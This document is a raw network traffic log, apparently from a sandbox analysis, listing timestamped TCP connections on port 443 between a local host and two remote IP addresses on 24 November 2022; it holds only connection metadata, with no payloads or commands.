Nov 24, 2022 12:21:11.087076902 CET	443	49853	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:11.087670088 CET	443	49853	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:11.087754011 CET	49853	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:11.109373093 CET	49853	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:11.109400988 CET	443	49853	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:11.213721991 CET	443	49853	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:11.215174913 CET	49853	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:11.215198040 CET	443	49853	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:11.216941118 CET	49853	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:11.217055082 CET	49853	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:11.217128038 CET	443	49853	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:11.217461109 CET	443	49853	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:11.217536926 CET	49853	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:11.217856884 CET	49853	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:11.282560110 CET	49855	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:11.282656908 CET	443	49855	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:11.282771111 CET	49855	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:11.345313072 CET	49855	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:11.345370054 CET	443	49855	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:11.345487118 CET	443	49855	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:11.466538906 CET	49856	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:11.466605902 CET	443	49856	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:11.466937065 CET	49856	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:11.470073938 CET	49856	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:11.470115900 CET	443	49856	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:11.498855114 CET	49857	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:11.498924971 CET	443	49857	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:11.499052048 CET	49857	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:11.499569893 CET	49857	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:11.499588966 CET	443	49857	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:11.499667883 CET	443	49857	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:11.519901991 CET	443	49856	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:11.520221949 CET	49856	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:11.533113003 CET	49856	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:11.533155918 CET	443	49856	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:11.533950090 CET	443	49856	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:11.534908056 CET	49856	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:11.534908056 CET	49856	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:11.534943104 CET	443	49856	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:11.612205982 CET	49858	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:11.612253904 CET	443	49858	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:11.612329006 CET	49858	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:11.612747908 CET	49858	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:11.612770081 CET	443	49858	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:11.612831116 CET	443	49858	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:11.628622055 CET	443	49856	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:11.628715038 CET	49856	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:11.628715992 CET	443	49856	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:11.628845930 CET	49856	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:11.708345890 CET	49856	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:11.708401918 CET	443	49856	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:11.823750973 CET	49859	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:11.823822975 CET	443	49859	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:11.824686050 CET	49859	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:11.825407028 CET	49859	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:11.825438976 CET	443	49859	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:11.843328953 CET	49860	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:11.843391895 CET	443	49860	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:11.844073057 CET	49860	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:11.844402075 CET	49860	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:11.844444036 CET	443	49860	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:11.844531059 CET	443	49860	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:11.871859074 CET	443	49859	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:11.871994972 CET	49859	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:11.880199909 CET	49859	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:11.880220890 CET	443	49859	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:11.914709091 CET	49859	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:11.914745092 CET	443	49859	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:11.976181984 CET	443	49859	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:11.976304054 CET	443	49859	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:11.976423025 CET	49859	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:11.977711916 CET	49859	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:11.977750063 CET	443	49859	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:12.116559029 CET	49861	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:12.116611004 CET	443	49861	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:12.116684914 CET	49861	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:12.117115021 CET	49861	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:12.117126942 CET	443	49861	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:12.117176056 CET	443	49861	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:12.224296093 CET	49862	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:12.224339962 CET	443	49862	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:12.225112915 CET	49862	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:12.225114107 CET	49862	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:12.225156069 CET	443	49862	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:12.271039009 CET	443	49862	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:12.271255970 CET	49862	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:12.271929026 CET	49862	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:12.271964073 CET	443	49862	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:12.276607037 CET	49862	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:12.276634932 CET	443	49862	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:12.295649052 CET	49863	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:12.295722008 CET	443	49863	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:12.295829058 CET	49863	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:12.296235085 CET	49863	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:12.296264887 CET	443	49863	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:12.296325922 CET	443	49863	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:12.391489983 CET	443	49862	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:12.391887903 CET	49862	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:12.391913891 CET	443	49862	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:12.392136097 CET	49862	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:12.392136097 CET	49862	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:12.392199039 CET	443	49862	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:12.392312050 CET	49862	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:12.512757063 CET	49864	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:12.512818098 CET	443	49864	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:12.512892962 CET	49864	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:12.513329983 CET	49864	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:12.513346910 CET	443	49864	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:12.513398886 CET	443	49864	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:12.627255917 CET	49865	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:12.627312899 CET	443	49865	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:12.627403975 CET	49865	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:12.629728079 CET	49865	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:12.629760981 CET	443	49865	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:12.678771973 CET	443	49865	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:12.678900003 CET	49865	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:12.685230970 CET	49865	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:12.685250044 CET	443	49865	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:12.685614109 CET	443	49865	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:12.685683012 CET	49865	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:12.690560102 CET	49865	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:12.690579891 CET	443	49865	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:12.714644909 CET	49866	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:12.714704990 CET	443	49866	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:12.714811087 CET	49866	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:12.715130091 CET	49866	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:12.715141058 CET	443	49866	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:12.715404987 CET	443	49866	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:12.810997963 CET	443	49865	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:12.811096907 CET	49865	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:12.811125040 CET	443	49865	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:12.811145067 CET	443	49865	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:12.811196089 CET	49865	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:12.811213970 CET	49865	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:12.814734936 CET	49865	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:12.814765930 CET	443	49865	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:12.933504105 CET	49867	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:12.933547974 CET	443	49867	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:12.933671951 CET	49867	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:12.934357882 CET	49867	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:12.934371948 CET	443	49867	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:12.936346054 CET	49868	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:12.936387062 CET	443	49868	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:12.936499119 CET	49868	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:12.936945915 CET	49868	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:12.936969042 CET	443	49868	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:12.937026978 CET	443	49868	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:12.983542919 CET	443	49867	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:12.983650923 CET	49867	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:13.002068996 CET	49867	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:13.002101898 CET	443	49867	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:13.047538996 CET	49867	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:13.047569036 CET	443	49867	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:13.112095118 CET	443	49867	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:13.112185955 CET	49867	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:13.112210035 CET	443	49867	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:13.112262011 CET	49867	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:13.112695932 CET	49867	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:13.112746954 CET	443	49867	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:13.112818956 CET	49867	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:13.254061937 CET	49869	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:13.254132986 CET	443	49869	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:13.254255056 CET	49869	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:13.304346085 CET	49869	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:13.304382086 CET	443	49869	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:13.304456949 CET	443	49869	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:13.445828915 CET	49870	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:13.445873976 CET	443	49870	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:13.445976973 CET	49870	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:13.458383083 CET	49870	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:13.458422899 CET	443	49870	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:13.490633011 CET	49871	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:13.490694046 CET	443	49871	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:13.490792036 CET	49871	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:13.491343975 CET	49871	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:13.491377115 CET	443	49871	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:13.491420984 CET	443	49871	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:13.502254963 CET	443	49870	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:13.502345085 CET	49870	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:13.519680023 CET	49870	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:13.519721985 CET	443	49870	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:13.520267963 CET	443	49870	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:13.520792961 CET	49870	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:13.522942066 CET	49870	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:13.522965908 CET	443	49870	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:13.625967979 CET	443	49870	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:13.627676964 CET	49870	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:13.627701998 CET	443	49870	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:13.627763033 CET	49870	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:13.635979891 CET	49870	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:13.636130095 CET	443	49870	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:13.636250973 CET	49870	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:13.837086916 CET	49872	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:13.837126017 CET	443	49872	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:13.837215900 CET	49872	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:13.837594986 CET	49872	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:13.837610960 CET	443	49872	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:13.837663889 CET	443	49872	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:13.956289053 CET	49873	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:13.956362963 CET	443	49873	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:13.958154917 CET	49873	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:13.958803892 CET	49873	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:13.958842039 CET	443	49873	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:14.022268057 CET	443	49873	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:14.022501945 CET	49873	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:14.064714909 CET	49873	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:14.064750910 CET	443	49873	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:14.065212011 CET	443	49873	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:14.065289974 CET	49873	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:14.066135883 CET	49873	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:14.066157103 CET	443	49873	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:14.069703102 CET	49874	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:14.069757938 CET	443	49874	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:14.070004940 CET	49874	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:14.070383072 CET	49874	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:14.070413113 CET	443	49874	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:14.070506096 CET	443	49874	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:14.136009932 CET	443	49873	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:14.136148930 CET	443	49873	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:14.136189938 CET	49873	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:14.136220932 CET	49873	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:14.161870003 CET	49873	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:14.161912918 CET	443	49873	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:14.377536058 CET	49875	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:14.377595901 CET	443	49875	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:14.377784014 CET	49875	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:14.378195047 CET	49875	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:14.378220081 CET	443	49875	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:14.378268957 CET	443	49875	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:14.488107920 CET	49876	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:14.488187075 CET	443	49876	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:14.488284111 CET	49876	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:14.493922949 CET	49876	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:14.493983030 CET	443	49876	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:14.538984060 CET	443	49876	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:14.539098024 CET	49876	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:14.543415070 CET	49876	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:14.543452978 CET	443	49876	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:14.548953056 CET	49876	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:14.548995972 CET	443	49876	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:14.597043991 CET	49877	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:14.597100973 CET	443	49877	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:14.597358942 CET	49877	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:14.597712994 CET	49877	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:14.597753048 CET	443	49877	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:14.597836018 CET	443	49877	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:14.672657967 CET	443	49876	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:14.672739029 CET	49876	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:14.672759056 CET	443	49876	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:14.672862053 CET	49876	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:14.677664995 CET	49876	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:14.677793980 CET	443	49876	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:14.677871943 CET	49876	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:14.810084105 CET	49878	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:14.810151100 CET	443	49878	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:14.810265064 CET	49878	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:14.827168941 CET	49878	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:14.827204943 CET	443	49878	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:14.866267920 CET	49879	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:14.866321087 CET	443	49879	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:14.866440058 CET	49879	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:14.866940975 CET	49879	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:14.866956949 CET	443	49879	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:14.867146969 CET	443	49879	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:14.875231981 CET	443	49878	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:14.875327110 CET	49878	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:14.939713001 CET	49878	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:14.939765930 CET	443	49878	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:14.940263033 CET	443	49878	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:14.940550089 CET	49878	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:14.943552971 CET	49878	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:14.943578005 CET	443	49878	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:15.042068958 CET	443	49878	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:15.042165041 CET	443	49878	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:15.042287111 CET	49878	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:15.042610884 CET	49878	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:15.042610884 CET	49878	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:15.099543095 CET	49880	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:15.099596024 CET	443	49880	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:15.099710941 CET	49880	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:15.100128889 CET	49880	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:15.100148916 CET	443	49880	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:15.100199938 CET	443	49880	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:15.176556110 CET	49881	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:15.176631927 CET	443	49881	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:15.176739931 CET	49881	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:15.178908110 CET	49881	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:15.178960085 CET	443	49881	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:15.226269007 CET	443	49881	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:15.226352930 CET	49881	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:15.245937109 CET	49881	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:15.245973110 CET	443	49881	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:15.253302097 CET	49881	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:15.253334045 CET	443	49881	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:15.286957026 CET	49882	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:15.287034988 CET	443	49882	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:15.287352085 CET	49882	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:15.288260937 CET	49882	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:15.288288116 CET	443	49882	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:15.288358927 CET	443	49882	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:15.356519938 CET	443	49881	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:15.356632948 CET	49881	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:15.356650114 CET	443	49881	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:15.358321905 CET	49881	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:15.409122944 CET	49881	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:15.409298897 CET	443	49881	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:15.409394979 CET	49881	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:15.482805967 CET	49878	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:15.482846022 CET	443	49878	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:15.623394012 CET	49883	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:15.623456955 CET	443	49883	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:15.623569965 CET	49883	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:15.627424955 CET	49883	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:15.627449036 CET	443	49883	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:15.627528906 CET	443	49883	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:15.738745928 CET	49884	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:15.738816023 CET	443	49884	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:15.738940954 CET	49884	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:15.739886999 CET	49884	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:15.739916086 CET	443	49884	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:15.789264917 CET	49885	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:15.789320946 CET	443	49885	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:15.789880991 CET	49885	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:15.793056965 CET	49885	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:15.793107986 CET	443	49885	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:15.793169975 CET	443	49885	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:15.793201923 CET	443	49884	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:15.793307066 CET	49884	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:15.830866098 CET	49884	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:15.830931902 CET	443	49884	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:15.832293034 CET	443	49884	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:15.832554102 CET	49884	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:15.838804960 CET	49884	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:15.838835955 CET	443	49884	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:15.907558918 CET	443	49884	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:15.907675028 CET	49884	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:15.907697916 CET	443	49884	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:15.907731056 CET	443	49884	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:15.907756090 CET	49884	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:15.907789946 CET	49884	443	192.168.2.3	172.66.43.60
